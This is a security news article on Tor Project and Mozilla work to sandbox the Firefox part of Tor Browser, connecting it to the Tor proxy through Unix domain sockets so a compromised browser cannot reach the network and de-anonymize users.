In many cases, authorities and cyber spies targeted individual users’ computers; for this reason, the experts at the Tor Project, alongside the Mozilla Firefox experts involved in the project, are working on a series of improvements to make it harder to exploit flaws in the browser component of the Tor architecture.
The improvements aim to block malware from trying to gather information to unmask users.
“We’re at the stage right now where we have created the basic tools and we’re working on putting them together to realize the security benefits,” Richard Barnes, Firefox Security Lead, told Joseph Cox from Motherboard via email.
The Tor Browser is composed of two components: a modified version of the Firefox browser, and the Tor proxy, which implements routing over the Tor network. An attacker can try to compromise the browser component and force it to connect to something other than the legitimate Tor proxy, for example a server set up by the attacker to gather user data.
“That means if an attacker can compromise the Firefox half of Tor Browser, it can de-anonymize the user by connecting to something other than the Tor proxy,” Barnes said.
Barnes described a series of improvements, including the use of Unix domain sockets, which are data communication endpoints for exchanging data between processes running on the same operating system.
This will allow the Firefox component to communicate securely with the Tor proxy without going through the network stack. In this way the experts can sandbox the Firefox component: any manipulation or attack will have no effect on the user’s privacy, because the browser would not be able to make a network connection to de-anonymize the user.
Basically, the intent of the experts at the Tor Project is to sandbox the Tor Browser to insulate users from attacks such as the NIT and similar ones. According to Motherboard, the Tor developer Yawning Angel has just finished an experimental prototype that will likely appear in some versions of the Tor Browser later this year.
“That means that you could run it in a sandbox with no network access (only a Unix domain socket to the proxy), and it would still work fine. And then, even if the Firefox half of Tor Browser were compromised, it wouldn’t be able to make a network connection to de-anonymize the user,” added Barnes.
As explained by Barnes, this kind of security measure is currently supported only on platforms that implement Unix domain sockets, such as Linux and Mac OS.
The experts are now working to extend it to Windows platforms.